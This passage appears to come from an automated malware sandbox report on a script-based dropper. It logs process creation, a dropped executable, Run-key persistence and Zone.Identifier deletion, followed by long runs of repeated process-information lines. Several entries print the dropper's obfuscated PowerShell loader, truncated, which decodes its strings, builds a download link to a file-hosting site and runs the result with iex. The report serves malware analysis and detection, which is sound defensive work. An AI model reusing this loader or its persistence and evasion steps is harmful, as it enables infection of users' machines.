DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanJump to behavior
            Source: newfile.exe.18.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
            Source: newfile.exe.18.drStatic PE information: section name: .didat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8883E6F87 push esp; retf 5_2_00007FF8883E6F88
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07500638 push eax; mov dword ptr [esp], ecx13_2_07500AC4
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F13F8 pushfd ; retf 22_2_005F13F9
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F376D push ecx; ret 22_2_005F3780
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\newfile\newfile.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfileJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfileJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
